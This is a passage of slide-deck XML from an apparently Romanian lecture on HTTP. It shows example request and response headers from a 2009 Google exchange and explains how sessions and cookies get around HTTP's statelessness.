            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Accept-Encoding: gzip,deflate</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Accept-Charset:  ISO-8859-1,utf-8;q=0.7,*;q=0.7</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Keep-Alive: 300</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Cookie:PREF=ID=141ca2d4581746b4:U=f22e9e94ccc4a56f:FF=4:LD=en:NR=10:CR=2:TM=1249567334:LM=1251146058:GM=1:S=qWowBrte7hrXniGp; NID=27=n9Khexo85YHnovw93wK4qC2lZtGa1DnzVQEB6iul9tn62fsJ7gFuMVK252ceLCD3iS54r-nHD6kWDdD1JP77akDhMl0EWzoTbPt3cM5g8mapG9SskdRSyEyLWcJK1LrX</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Cache-Control: max-age=0</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>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Raspuns HTTP - exemplu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;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20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Date: Tue, 13 Oct 2009 05:27:42 GMT</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Expires: -1</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Cache-Control: private, max-age=0</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Content-Type: text/html; charset=UTF-8</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Content-Encoding: gzip</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Server: gws</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Content-Length: 3667</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>X-XSS-Protection: 0</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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 document html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Sesiuni si cookie-uri</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1171600"/>
            <a:ext cx="8578500" cy="373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Deoarece HTTP este protocol stateless, serverul web nu are de unde stii ca doua cereri diferite vin de la acelasi utilizator final (ex. daca vreau sa trimit 2 mailuri succesive cu Gmail.com, ar trebui sa ma autentici cu user+parola de 2 ori, la fiecare mail) =&gt; problema de utilizabilitate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Aplicatiile web ocolesc problema asta prin conceptul de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sesiune</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (mai multe cereri HTTP care tin de acelasi utilizator)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>O sesiune HTTP este identificata prin unul sau mai multe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-uri stocate de browser (plus unele date salvate la server).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nume=valoare</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Serverul genereaza un cookie dupa ce utilizatorul se autentifica si trimite acest cookie browserului utilizatorului; browserul adauga automat acest cookie la fiecare cerere pe care o trimite spre acelasi server HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cookie-urile au un timp de expirare si se distrug cand utilizatorul de de-autentifica (logout)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